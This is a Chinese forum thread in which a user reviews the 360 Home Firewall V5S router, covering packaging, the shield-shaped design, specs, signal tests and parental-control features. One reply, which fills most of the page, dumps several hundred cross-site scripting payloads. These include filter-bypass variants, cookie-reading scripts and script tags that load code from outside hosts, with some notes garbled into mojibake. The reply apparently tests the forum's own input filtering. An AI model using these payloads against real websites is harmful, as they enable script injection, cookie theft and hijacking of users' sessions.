关闭

绑定手机号

应国家法规对于账号实名的要求,请您在进行下一步操作前,需要先完成手机绑定 (若绑定失败,请重新登录绑定)。了解更多

不绑定绑定手机号

360官网 | 会员商城 | 360手机官网 | 社区客户端

推荐论坛版块用户节2019活动众测会员商城积分商城
本帖最后由 风雨兼程82 于 2019-10-10 11:45 编辑
开箱体验

360社区

360社区

360社区

360社区

360社区

360社区


包装盒设计一般,文字和配图采用黑白色调,而且盒子设计有缺陷上盖左右两边没有向下叉的档板造成盒子从侧面看有很大缝隙(上图3),里面的说明书如果放在上面肯定会掉出来。路由器包了很多层塑料泡沫但别面左下角仍然有很大的磕痕不知道是不是运输造成(如图2)。
外观感受

360社区

360社区

360社区

360社区

360社区

360社区



这款路由器外观是亮点,从正面看是一个盾牌形状,看上去就给人安全的感觉,非常符合360安全路由器的理念。背面是3个网口,WAN/LAN随意插,这个设计也不错。
硬件功能体验

360社区

360社区

360社区

360社区

360社区

360社区

360社区

360社区


硬件配置方面这款路由器采用的是3网口全千兆设计,4天线1200Mbps,CPU MT7621DA双核880MHZ ,内存128Mb闪存16Mb.
第一次联网很顺利,因为有光猫不需要拨号插上网线通电手机就能搜索到设备,绑定后设置无线密码,这款路由的指示灯设计非常美观,(不像以前的路由上面好多灯不停的闪,有密集恐惧症的人都不敢看)有3种颜色绿色常亮:可以上网、橙色常亮:无法上网、红色闪烁:系统启动。
信号覆盖不错,因家里面积不是很大最远的地方5G掉一格信号,其他地方都是满格。 移动300M网络测试下载速度能达到44M已经很不错了。

软件功能体验

360社区

360社区

360社区

360社区

360社区

360社区


360路由器主打安全,从软件上就能看到360在安全方面的耕耘。首先是路由器的功能设置,路由所有的功能都通过“路由设置”菜单实现,谁在上网打开“联网设备”菜单,一目了然。而且可以查看每个设备的上下线时间记录,还可以设置每个设备的定时断网时间和限制上传下载速度。

360社区

360社区

360社区

360社区



在上网防沉迷菜单下我们可以根据设备的使用人设置对应的角色进项安全防护,软件每天都会吧每个人的设备使用情况列出明细发送到微信,随时掌握家人使用网络的情况,真正做到了孩子上网防沉迷,老人上网防欺诈、智能硬件防入侵,通过这款路由器我真的体会到了360安全路由器在安全方面做出的努力。

总结
通过几天的使用,有以下几点感触,首先是外观的改变,路由器路站起来了,节省了空间,提高了散热能力,外观时尚,盾牌外形设计,配合绿色灯光,让人感觉这款路由器可以提供绿色安全的网络环境。超赞。再有就是软件安全方面尤其是针对孩子现在手机的使用,不给她就不高兴,给了她就很难限制时间,控制上网内容,有了这款路由器我们不但可以控制孩子玩手机的时间,还可以看到孩子用手机干了什么。

新品推荐|360扫地机器人X90领劵立减800元

共 3 个关于家庭防火墙V5S站起来的路由器的回复 最后回复于 2019-10-9 14:47

评论

直达楼层

风雨兼程82 LV4.上士 楼主 发表于 2019-10-5 20:05 | 显示全部楼层 | 私信
发表了吗
360fans_75556461 LV2.下士 发表于 2019-10-9 14:47 | 显示全部楼层 | 私信
1212121212121
360fans_75556461 LV2.下士 发表于 2019-10-9 14:47 | 显示全部楼层 | 私信
  1. <script>alert("XSS")</script>  
  2. <script>alert(123)</script>
  3. ´úÂë¹ýÂË£º
  4. medium--> ˫дÈƹý£º<sc<script>ript>alert(/xss/)</script>
  5.             ´óСд»ìÏýÈƹý£º<ScRipt>alert(/xss/)</script>
  6. high-->ͨ¹ýimg¡¢bodyµÈ±êÇ©µÄʼþ»òÕßiframeµÈ±êÇ©µÄsrc×¢Èë¶ñÒâµÄjs´úÂë:
  7.         <img src=1 onerror=alert(/xss/)>
  8. <scRscrIPT>prompt(¡®qq¡¯)<Scrscriptipt>
  9. onmouseover=¡¯alert(xss)¡¯
  10. onmouseover=¡¯prompt(qq)¡¯
  11. <script>alert('hello£¬gaga!');</script>
  12. >"'><img src="javascript.:alert('XSS')">
  13. >"'><script>alert('XSS')</script>
  14. <table background='javascript.:alert(([code])'></table>
  15. <object type=text/html data='javascript.:alert(([code]);'></object>
  16. "+alert('XSS')+"
  17. '><script>alert(document.cookie)</script>
  18. ='><script>alert(document.cookie)</script>
  19. <script>alert(document.cookie)</script>
  20. <script>alert(vulnerable)</script>
  21. <script>alert('XSS')</script>
  22. <img src="javascript:alert('XSS')">
  23. %0a%0a<script>alert(\"Vulnerable\")</script>.jsp
  24. %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
  25. %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
  26. %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
  27. <script>alert('Vulnerable')</script>
  28. a.jsp/<script>alert('Vulnerable')</script>
  29. "><script>alert('Vulnerable')</script>
  30. <IMG SRC="javascript.:alert('XSS');">
  31. <IMG src="/javascript.:alert"('XSS')>
  32. <IMG src="/JaVaScRiPt.:alert"('XSS')>
  33. <IMG src="/JaVaScRiPt.:alert"("XSS")>
  34. <IMG SRC="jav        ascript.:alert('XSS');">
  35. <IMG SRC="jav
  36. ascript.:alert('XSS');">
  37. <IMG SRC="jav
    ascript.:alert('XSS');">
  38. "<IMG src="/java"\0script.:alert(\"XSS\")>";'>out
  39. <IMG SRC=" javascript.:alert('XSS');">
  40. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
  41. <BODY BACKGROUND="javascript.:alert('XSS')">
  42. <BODY ONLOAD=alert('XSS')>
  43. <IMG DYNSRC="javascript.:alert('XSS')">
  44. <IMG LOWSRC="javascript.:alert('XSS')">
  45. <BGSOUND SRC="javascript.:alert('XSS');">
  46. <br size="&{alert('XSS')}">
  47. <LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>
  48. <LINK REL="stylesheet"HREF="javascript.:alert('XSS');">
  49. <IMG SRC='vbscript.:msgbox("XSS")'>
  50. <META. HTTP-EQUIV="refresh"CONTENT="0;url=javascript.:alert('XSS');">
  51. <IFRAME. src="/javascript.:alert"('XSS')></IFRAME>
  52. <FRAMESET><FRAME. src="/javascript.:alert"('XSS')></FRAME></FRAMESET>
  53. <TABLE BACKGROUND="javascript.:alert('XSS')">
  54. <DIV STYLE="background-image: url(javascript.:alert('XSS'))">
  55. <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
  56. <DIV STYLE="width: expression(alert('XSS'));">
  57. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  58. <IMG STYLE='xss:expre\ssion(alert("XSS"))'>
  59. <STYLE. TYPE="text/javascript">alert('XSS');</STYLE>
  60. <STYLE. TYPE="text/css">.XSS{background-image:url("javascript.:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  61. <STYLE. type="text/css">BODY{background:url("javascript.:alert('XSS')")}</STYLE>
  62. <BASE HREF="javascript.:alert('XSS');//">
  63. getURL("javascript.:alert('XSS')")
  64. a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d);
  65. <XML SRC="javascript.:alert('XSS');">
  66. "> <BODY NLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
  67. <SCRIPT. SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
  68. <IMG SRC="javascript.:alert('XSS')"
  69. <SCRIPT. a=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
  70. <SCRIPT.=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
  71. <SCRIPT. a=">"''SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
  72. <SCRIPT."a='>'"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
  73. <SCRIPT>document.write("<SCRI");</SCRIPT>PTSRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
  74. <A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
  75. <script\x20type="text/javascript">javascript:alert(1);</script>
  76. <script\x3Etype="text/javascript">javascript:alert(2);</script>
  77. <script\x0Dtype="text/javascript">javascript:alert(3);</script>
  78. <script\x09type="text/javascript">javascript:alert(4);</script>
  79. <script\x0Ctype="text/javascript">javascript:alert(5);</script>
  80. <script\x2Ftype="text/javascript">javascript:alert(6);</script>
  81. <script\x0Atype="text/javascript">javascript:alert(7);</script>
  82. '`"><\x3Cscript>javascript:alert(8)</script>
  83. '`"><\x00script>javascript:alert(9)</script>
  84. <img src=10 href=10 onerror="javascript:alert(10)"></img>
  85. <audio src=11 href=11 onerror="javascript:alert(11)"></audio>
  86. <video src=12 href=12 onerror="javascript:alert(12)"></video>
  87. <body src=13 href=13 onerror="javascript:alert(13)"></body>
  88. <image src=14 href=14 onerror="javascript:alert(14)"></image>
  89. <object src=15 href=15 onerror="javascript:alert(15)"></object>
  90. <script src=16 href=16 onerror="javascript:alert(16)"></script>
  91. <svg onResize svg onResize="javascript:javascript:alert(17)"></svg onResize>
  92. <title onPropertyChange title onPropertyChange="javascript:javascript:alert(18)"></title onPropertyChange>
  93. <iframe onLoad iframe onLoad="javascript:javascript:alert(19)"></iframe onLoad>
  94. <body onMouseEnter body onMouseEnter="javascript:javascript:alert(20)"></body onMouseEnter>
  95. <body onFocus body onFocus="javascript:javascript:alert(21)"></body onFocus>
  96. <frameset onScroll frameset onScroll="javascript:javascript:alert(22)"></frameset onScroll>
  97. <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(23)"></script onReadyStateChange>
  98. <html onMouseUp html onMouseUp="javascript:javascript:alert(24)"></html onMouseUp>
  99. <body onPropertyChange body onPropertyChange="javascript:javascript:alert(25)"></body onPropertyChange>
  100. <svg onLoad svg onLoad="javascript:javascript:alert(26)"></svg onLoad>
  101. <body onPageHide body onPageHide="javascript:javascript:alert(27)"></body onPageHide>
  102. <body onMouseOver body onMouseOver="javascript:javascript:alert(28)"></body onMouseOver>
  103. <body onUnload body onUnload="javascript:javascript:alert(29)"></body onUnload>
  104. <body onLoad body onLoad="javascript:javascript:alert(30)"></body onLoad>
  105. <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(31)"></bgsound onPropertyChange>
  106. <html onMouseLeave html onMouseLeave="javascript:javascript:alert(32)"></html onMouseLeave>
  107. <html onMouseWheel html onMouseWheel="javascript:javascript:alert(33)"></html onMouseWheel>
  108. <style onLoad style onLoad="javascript:javascript:alert(34)"></style onLoad>
  109. <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(35)"></iframe onReadyStateChange>
  110. <body onPageShow body onPageShow="javascript:javascript:alert(36)"></body onPageShow>
  111. <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(37)"></style onReadyStateChange>
  112. <frameset onFocus frameset onFocus="javascript:javascript:alert(38)"></frameset onFocus>
  113. <applet onError applet onError="javascript:javascript:alert(39)"></applet onError>
  114. <marquee onStart marquee onStart="javascript:javascript:alert(40)"></marquee onStart>
  115. <script onLoad script onLoad="javascript:javascript:alert(41)"></script onLoad>
  116. <html onMouseOver html onMouseOver="javascript:javascript:alert(42)"></html onMouseOver>
  117. <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(43)"></html onMouseEnter>
  118. <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(44)"></body onBeforeUnload>
  119. <html onMouseDown html onMouseDown="javascript:javascript:alert(45)"></html onMouseDown>
  120. <marquee onScroll marquee onScroll="javascript:javascript:alert(46)"></marquee onScroll>
  121. <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(47)"></xml onPropertyChange>
  122. <frameset onBlur frameset onBlur="javascript:javascript:alert(48)"></frameset onBlur>
  123. <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(49)"></applet onReadyStateChange>
  124. <svg onUnload svg onUnload="javascript:javascript:alert(50)"></svg onUnload>
  125. <html onMouseOut html onMouseOut="javascript:javascript:alert(51)"></html onMouseOut>
  126. <body onMouseMove body onMouseMove="javascript:javascript:alert(52)"></body onMouseMove>
  127. <body onResize body onResize="javascript:javascript:alert(53)"></body onResize>
  128. <object onError object onError="javascript:javascript:alert(54)"></object onError>
  129. <body onPopState body onPopState="javascript:javascript:alert(55)"></body onPopState>
  130. <html onMouseMove html onMouseMove="javascript:javascript:alert(56)"></html onMouseMove>
  131. <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(57)"></applet onreadystatechange>
  132. <body onpagehide body onpagehide="javascript:javascript:alert(58)"></body onpagehide>
  133. <svg onunload svg onunload="javascript:javascript:alert(59)"></svg onunload>
  134. <applet onerror applet onerror="javascript:javascript:alert(60)"></applet onerror>
  135. <body onkeyup body onkeyup="javascript:javascript:alert(61)"></body onkeyup>
  136. <body onunload body onunload="javascript:javascript:alert(62)"></body onunload>
  137. <iframe onload iframe onload="javascript:javascript:alert(63)"></iframe onload>
  138. <body onload body onload="javascript:javascript:alert(64)"></body onload>
  139. <html onmouseover html onmouseover="javascript:javascript:alert(65)"></html onmouseover>
  140. <object onbeforeload object onbeforeload="javascript:javascript:alert(66)"></object onbeforeload>
  141. <body onbeforeunload body onbeforeunload="javascript:javascript:alert(67)"></body onbeforeunload>
  142. <body onfocus body onfocus="javascript:javascript:alert(68)"></body onfocus>
  143. <body onkeydown body onkeydown="javascript:javascript:alert(69)"></body onkeydown>
  144. <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(70)"></iframe onbeforeload>
  145. <iframe src iframe src="javascript:javascript:alert(71)"></iframe src>
  146. <svg onload svg onload="javascript:javascript:alert(72)"></svg onload>
  147. <html onmousemove html onmousemove="javascript:javascript:alert(73)"></html onmousemove>
  148. <body onblur body onblur="javascript:javascript:alert(74)"></body onblur>
  149. \x3Cscript>javascript:alert(75)</script>
  150. '"`><script>/* *\x2Fjavascript:alert(76)// */</script>
  151. <script>javascript:alert(77)</script\x0D
  152. <script>javascript:alert(78)</script\x0A
  153. <script>javascript:alert(79)</script\x0B
  154. <script charset="\x22>javascript:alert(80)</script>
  155. <!--\x3E<img src=xxx:x onerror=javascript:alert(81)> -->
  156. --><!-- ---> <img src=xxx:x onerror=javascript:alert(82)> -->
  157. --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(83)> -->
  158. --><!-- --\x284> <img src=xxx:x onerror=javascript:alert(84)> -->
  159. --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(85)> -->
  160. `"'><img src='#\x27 onerror=javascript:alert(86)>
  161. <a href="javascript\x3Ajavascript:alert(87)" id="fuzzelement87">test</a>
  162. "'`><p><svg><script>a='hello\x27;javascript:alert(88)//';</script></p>
  163. <a href="javas\x00cript:javascript:alert(89)" id="fuzzelement89">test</a>
  164. <a href="javas\x07cript:javascript:alert(90)" id="fuzzelement90">test</a>
  165. <a href="javas\x0Dcript:javascript:alert(91)" id="fuzzelement91">test</a>
  166. <a href="javas\x0Acript:javascript:alert(92)" id="fuzzelement92">test</a>
  167. <a href="javas\x08cript:javascript:alert(93)" id="fuzzelement93">test</a>
  168. <a href="javas\x02cript:javascript:alert(94)" id="fuzzelement94">test</a>
  169. <a href="javas\x03cript:javascript:alert(95)" id="fuzzelement95">test</a>
  170. <a href="javas\x04cript:javascript:alert(96)" id="fuzzelement96">test</a>
  171. <a href="javas\x097cript:javascript:alert(97)" id="fuzzelement97">test</a>
  172. <a href="javas\x05cript:javascript:alert(98)" id="fuzzelement98">test</a>
  173. <a href="javas\x0Bcript:javascript:alert(99)" id="fuzzelement99">test</a>
  174. <a href="javas\x09cript:javascript:alert(100)" id="fuzzelement100">test</a>
  175. <a href="javas\x06cript:javascript:alert(101)" id="fuzzelement101">test</a>
  176. <a href="javas\x0Ccript:javascript:alert(102)" id="fuzzelement102">test</a>
  177. <script>/* *\x2A/javascript:alert(103)// */</script>
  178. <script>/* *\x00/javascript:alert(104)// */</script>
  179. <style></style\x3E<img src="about:blank" onerror=javascript:alert(105)//></style>
  180. <style></style\x0D<img src="about:blank" onerror=javascript:alert(106)//></style>
  181. <style></style\x09<img src="about:blank" onerror=javascript:alert(107)//></style>
  182. <style></style\x20<img src="about:blank" onerror=javascript:alert(108)//></style>
  183. <style></style\x0A<img src="about:blank" onerror=javascript:alert(109)//></style>
  184. "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(110);/*';">DEF
  185. "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(111);/*';">DEF
  186. <script>if("x\\xE112\x96\x89".length==2) { javascript:alert(112);}</script>
  187. <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(113);}</script>
  188. <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(114);}</script>
  189. '`"><\x3Cscript>javascript:alert(115)</script>
  190. '`"><\x00script>javascript:alert(116)</script>
  191. "'`><\x3Cimg src=xxx:x onerror=javascript:alert(117)>
  192. "'`><\x00img src=xxx:x onerror=javascript:alert(118)>
  193. <script src="data:text/plain\x2Cjavascript:alert(119)"></script>
  194. <script src="data:\xD4\x8F,javascript:alert(120)"></script>
  195. <script src="data:\xE0\xA4\x98,javascript:alert(121)"></script>
  196. <script src="data:\xCB\x8F,javascript:alert(122)"></script>
  197. <script\x20type="text/javascript">javascript:alert(123);</script>
  198. <script\x3Etype="text/javascript">javascript:alert(124);</script>
  199. <script\x0Dtype="text/javascript">javascript:alert(125);</script>
  200. <script\x09type="text/javascript">javascript:alert(126);</script>
  201. <script\x0Ctype="text/javascript">javascript:alert(127);</script>
  202. <script\x2Ftype="text/javascript">javascript:alert(128);</script>
  203. <script\x0Atype="text/javascript">javascript:alert(129);</script>
  204. ABC<div style="x\x3Aexpression(javascript:alert(130)">DEF
  205. ABC<div style="x:expression\x5C(javascript:alert(131)">DEF
  206. ABC<div style="x:expression\x00(javascript:alert(132)">DEF
  207. ABC<div style="x:exp\x00ression(javascript:alert(133)">DEF
  208. ABC<div style="x:exp\x5Cression(javascript:alert(134)">DEF
  209. ABC<div style="x:\x0Aexpression(javascript:alert(135)">DEF
  210. ABC<div style="x:\x09expression(javascript:alert(136)">DEF
  211. ABC<div style="x:\xE3\x80\x80expression(javascript:alert(137)">DEF
  212. ABC<div style="x:\xE2\x80\x84expression(javascript:alert(138)">DEF
  213. ABC<div style="x:\xC2\xA0expression(javascript:alert(139)">DEF
  214. ABC<div style="x:\xE2\x80\x80expression(javascript:alert(140)">DEF
  215. ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(141)">DEF
  216. ABC<div style="x:\x0Dexpression(javascript:alert(142)">DEF
  217. ABC<div style="x:\x0Cexpression(javascript:alert(143)">DEF
  218. ABC<div style="x:\xE2\x80\x87expression(javascript:alert(144)">DEF
  219. ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(145)">DEF
  220. ABC<div style="x:\x20expression(javascript:alert(146)">DEF
  221. ABC<div style="x:\xE2\x80\x88expression(javascript:alert(147)">DEF
  222. ABC<div style="x:\x00expression(javascript:alert(148)">DEF
  223. ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(149)">DEF
  224. ABC<div style="x:\xE2\x80\x86expression(javascript:alert(150)">DEF
  225. ABC<div style="x:\xE2\x80\x85expression(javascript:alert(151)">DEF
  226. ABC<div style="x:\xE2\x80\x82expression(javascript:alert(152)">DEF
  227. ABC<div style="x:\x0Bexpression(javascript:alert(153)">DEF
  228. ABC<div style="x:\xE2\x80\x8154expression(javascript:alert(154)">DEF
  229. ABC<div style="x:\xE2\x80\x83expression(javascript:alert(155)">DEF
  230. ABC<div style="x:\xE2\x80\x89expression(javascript:alert(156)">DEF
  231. <a href="\x0Bjavascript:javascript:alert(157)" id="fuzzelement157">test</a>
  232. <a href="\x0Fjavascript:javascript:alert(158)" id="fuzzelement158">test</a>
  233. <a href="\xC2\xA0javascript:javascript:alert(159)" id="fuzzelement159">test</a>
  234. <a href="\x05javascript:javascript:alert(160)" id="fuzzelement160">test</a>
  235. <a href="\xE161\xA0\x8Ejavascript:javascript:alert(161)" id="fuzzelement161">test</a>
  236. <a href="\x1628javascript:javascript:alert(162)" id="fuzzelement162">test</a>
  237. <a href="\x163163javascript:javascript:alert(163)" id="fuzzelement163">test</a>
  238. <a href="\xE2\x80\x88javascript:javascript:alert(164)" id="fuzzelement164">test</a>
  239. <a href="\xE2\x80\x89javascript:javascript:alert(165)" id="fuzzelement165">test</a>
  240. <a href="\xE2\x80\x80javascript:javascript:alert(166)" id="fuzzelement166">test</a>
  241. <a href="\x1677javascript:javascript:alert(167)" id="fuzzelement167">test</a>
  242. <a href="\x03javascript:javascript:alert(168)" id="fuzzelement168">test</a>
  243. <a href="\x0Ejavascript:javascript:alert(169)" id="fuzzelement169">test</a>
  244. <a href="\x170Ajavascript:javascript:alert(170)" id="fuzzelement170">test</a>
  245. <a href="\x00javascript:javascript:alert(171)" id="fuzzelement171">test</a>
  246. <a href="\x1720javascript:javascript:alert(172)" id="fuzzelement172">test</a>
  247. <a href="\xE2\x80\x82javascript:javascript:alert(173)" id="fuzzelement173">test</a>
  248. <a href="\x20javascript:javascript:alert(174)" id="fuzzelement174">test</a>
  249. <a href="\x1753javascript:javascript:alert(175)" id="fuzzelement175">test</a>
  250. <a href="\x09javascript:javascript:alert(176)" id="fuzzelement176">test</a>
  251. <a href="\xE2\x80\x8Ajavascript:javascript:alert(177)" id="fuzzelement177">test</a>
  252. <a href="\x1784javascript:javascript:alert(178)" id="fuzzelement178">test</a>
  253. <a href="\x1799javascript:javascript:alert(179)" id="fuzzelement179">test</a>
  254. <a href="\xE2\x80\xAFjavascript:javascript:alert(180)" id="fuzzelement180">test</a>
  255. <a href="\x181Fjavascript:javascript:alert(181)" id="fuzzelement181">test</a>
  256. <a href="\xE2\x80\x8182javascript:javascript:alert(182)" id="fuzzelement182">test</a>
  257. <a href="\x183Djavascript:javascript:alert(183)" id="fuzzelement183">test</a>
  258. <a href="\xE2\x80\x87javascript:javascript:alert(184)" id="fuzzelement184">test</a>
  259. <a href="\x07javascript:javascript:alert(185)" id="fuzzelement185">test</a>
  260. <a href="\xE186\x9A\x80javascript:javascript:alert(186)" id="fuzzelement186">test</a>
  261. <a href="\xE2\x80\x83javascript:javascript:alert(187)" id="fuzzelement187">test</a>
  262. <a href="\x04javascript:javascript:alert(188)" id="fuzzelement188">test</a>
  263. <a href="\x0189javascript:javascript:alert(189)" id="fuzzelement189">test</a>
  264. <a href="\x08javascript:javascript:alert(190)" id="fuzzelement190">test</a>
  265. <a href="\xE2\x80\x84javascript:javascript:alert(191)" id="fuzzelement191">test</a>
  266. <a href="\xE2\x80\x86javascript:javascript:alert(192)" id="fuzzelement192">test</a>
  267. <a href="\xE3\x80\x80javascript:javascript:alert(193)" id="fuzzelement193">test</a>
  268. <a href="\x1942javascript:javascript:alert(194)" id="fuzzelement194">test</a>
  269. <a href="\x0Djavascript:javascript:alert(195)" id="fuzzelement195">test</a>
  270. <a href="\x0Ajavascript:javascript:alert(196)" id="fuzzelement196">test</a>
  271. <a href="\x0Cjavascript:javascript:alert(197)" id="fuzzelement197">test</a>
  272. <a href="\x1985javascript:javascript:alert(198)" id="fuzzelement198">test</a>
  273. <a href="\xE2\x80\xA8javascript:javascript:alert(199)" id="fuzzelement199">test</a>
  274. <a href="\x2006javascript:javascript:alert(200)" id="fuzzelement200">test</a>
  275. <a href="\x02javascript:javascript:alert(201)" id="fuzzelement201">test</a>
  276. <a href="\x202Bjavascript:javascript:alert(202)" id="fuzzelement202">test</a>
  277. <a href="\x06javascript:javascript:alert(203)" id="fuzzelement203">test</a>
  278. <a href="\xE2\x80\xA9javascript:javascript:alert(204)" id="fuzzelement204">test</a>
  279. <a href="\xE2\x80\x85javascript:javascript:alert(205)" id="fuzzelement205">test</a>
  280. <a href="\x206Ejavascript:javascript:alert(206)" id="fuzzelement206">test</a>
  281. <a href="\xE2\x8207\x9Fjavascript:javascript:alert(207)" id="fuzzelement207">test</a>
  282. <a href="\x208Cjavascript:javascript:alert(208)" id="fuzzelement208">test</a>
  283. <a href="javascript\x00:javascript:alert(209)" id="fuzzelement209">test</a>
  284. <a href="javascript\x3A:javascript:alert(210)" id="fuzzelement210">test</a>
  285. <a href="javascript\x09:javascript:alert(211)" id="fuzzelement211">test</a>
  286. <a href="javascript\x0D:javascript:alert(212)" id="fuzzelement212">test</a>
  287. <a href="javascript\x0A:javascript:alert(213)" id="fuzzelement213">test</a>
  288. `"'><img src=xxx:x \x0Aonerror=javascript:alert(214)>
  289. `"'><img src=xxx:x \x22onerror=javascript:alert(215)>
  290. `"'><img src=xxx:x \x0Bonerror=javascript:alert(216)>
  291. `"'><img src=xxx:x \x0Donerror=javascript:alert(217)>
  292. `"'><img src=xxx:x \x2Fonerror=javascript:alert(218)>
  293. `"'><img src=xxx:x \x09onerror=javascript:alert(219)>
  294. `"'><img src=xxx:x \x0Conerror=javascript:alert(220)>
  295. `"'><img src=xxx:x \x00onerror=javascript:alert(221)>
  296. `"'><img src=xxx:x \x27onerror=javascript:alert(222)>
  297. `"'><img src=xxx:x \x20onerror=javascript:alert(223)>
  298. "`'><script>\x3Bjavascript:alert(224)</script>
  299. "`'><script>\x0Djavascript:alert(225)</script>
  300. "`'><script>\xEF\xBB\xBFjavascript:alert(226)</script>
  301. "`'><script>\xE2\x80\x8227javascript:alert(227)</script>
  302. "`'><script>\xE2\x80\x84javascript:alert(228)</script>
  303. "`'><script>\xE3\x80\x80javascript:alert(229)</script>
  304. "`'><script>\x09javascript:alert(230)</script>
  305. "`'><script>\xE2\x80\x89javascript:alert(231)</script>
  306. "`'><script>\xE2\x80\x85javascript:alert(232)</script>
  307. "`'><script>\xE2\x80\x88javascript:alert(233)</script>
  308. "`'><script>\x00javascript:alert(234)</script>
  309. "`'><script>\xE2\x80\xA8javascript:alert(235)</script>
  310. "`'><script>\xE2\x80\x8Ajavascript:alert(236)</script>
  311. "`'><script>\xE237\x9A\x80javascript:alert(237)</script>
  312. "`'><script>\x0Cjavascript:alert(238)</script>
  313. "`'><script>\x2Bjavascript:alert(239)</script>
  314. "`'><script>\xF0\x90\x96\x9Ajavascript:alert(240)</script>
  315. "`'><script>-javascript:alert(241)</script>
  316. "`'><script>\x0Ajavascript:alert(242)</script>
  317. "`'><script>\xE2\x80\xAFjavascript:alert(243)</script>
  318. "`'><script>\x7Ejavascript:alert(244)</script>
  319. "`'><script>\xE2\x80\x87javascript:alert(245)</script>
  320. "`'><script>\xE2\x8246\x9Fjavascript:alert(246)</script>
  321. "`'><script>\xE2\x80\xA9javascript:alert(247)</script>
  322. "`'><script>\xC2\x85javascript:alert(248)</script>
  323. "`'><script>\xEF\xBF\xAEjavascript:alert(249)</script>
  324. "`'><script>\xE2\x80\x83javascript:alert(250)</script>
  325. "`'><script>\xE2\x80\x8Bjavascript:alert(251)</script>
  326. "`'><script>\xEF\xBF\xBEjavascript:alert(252)</script>
  327. "`'><script>\xE2\x80\x80javascript:alert(253)</script>
  328. "`'><script>\x2254javascript:alert(254)</script>
  329. "`'><script>\xE2\x80\x82javascript:alert(255)</script>
  330. "`'><script>\xE2\x80\x86javascript:alert(256)</script>
  331. "`'><script>\xE257\xA0\x8Ejavascript:alert(257)</script>
  332. "`'><script>\x0Bjavascript:alert(258)</script>
  333. "`'><script>\x20javascript:alert(259)</script>
  334. "`'><script>\xC2\xA0javascript:alert(260)</script>
  335. "/><img/onerror=\x0Bjavascript:alert(261)\x0Bsrc=xxx:x />
  336. "/><img/onerror=\x22javascript:alert(262)\x22src=xxx:x />
  337. "/><img/onerror=\x09javascript:alert(263)\x09src=xxx:x />
  338. "/><img/onerror=\x27javascript:alert(264)\x27src=xxx:x />
  339. "/><img/onerror=\x0Ajavascript:alert(265)\x0Asrc=xxx:x />
  340. "/><img/onerror=\x0Cjavascript:alert(266)\x0Csrc=xxx:x />
  341. "/><img/onerror=\x0Djavascript:alert(267)\x0Dsrc=xxx:x />
  342. "/><img/onerror=\x60javascript:alert(268)\x60src=xxx:x />
  343. "/><img/onerror=\x20javascript:alert(269)\x20src=xxx:x />
  344. <script\x2F>javascript:alert(270)</script>
  345. <script\x20>javascript:alert(271)</script>
  346. <script\x0D>javascript:alert(272)</script>
  347. <script\x0A>javascript:alert(273)</script>
  348. <script\x0C>javascript:alert(274)</script>
  349. <script\x00>javascript:alert(275)</script>
  350. <script\x09>javascript:alert(276)</script>
  351. `"'><img src=xxx:x onerror\x0B=javascript:alert(277)>
  352. `"'><img src=xxx:x onerror\x00=javascript:alert(278)>
  353. `"'><img src=xxx:x onerror\x0C=javascript:alert(279)>
  354. `"'><img src=xxx:x onerror\x0D=javascript:alert(280)>
  355. `"'><img src=xxx:x onerror\x20=javascript:alert(281)>
  356. `"'><img src=xxx:x onerror\x0A=javascript:alert(282)>
  357. `"'><img src=xxx:x onerror\x09=javascript:alert(283)>
  358. <script>javascript:alert(284)<\x00/script>
  359. <img src=# onerror\x3D"javascript:alert(285)" >
  360. <input onfocus=javascript:alert(286) autofocus>
  361. <input onblur=javascript:alert(287) autofocus><input autofocus>
  362. <video poster=javascript:javascript:alert(288)//
  363. <body onscroll=javascript:alert(289)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  364. <form id=test onforminput=javascript:alert(290)><input></form><button form=test onformchange=javascript:alert(290)>X
  365. <video><source onerror="javascript:javascript:alert(291)">
  366. <video onerror="javascript:javascript:alert(292)"><source>
  367. <form><button formaction="javascript:javascript:alert(293)">X
  368. <body oninput=javascript:alert(294)><input autofocus>
  369. <math href="javascript:javascript:alert(295)">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(295)">CLICKME</maction> </math>
  370. <frameset onload=javascript:alert(296)>
  371. <table background="javascript:javascript:alert(297)">
  372. <!--<img src="--><img src=x onerror=javascript:alert(298)//">
  373. <comment><img src="</comment><img src=x onerror=javascript:alert(299))//">
  374. <![><img src="]><img src=x onerror=javascript:alert(300)//">
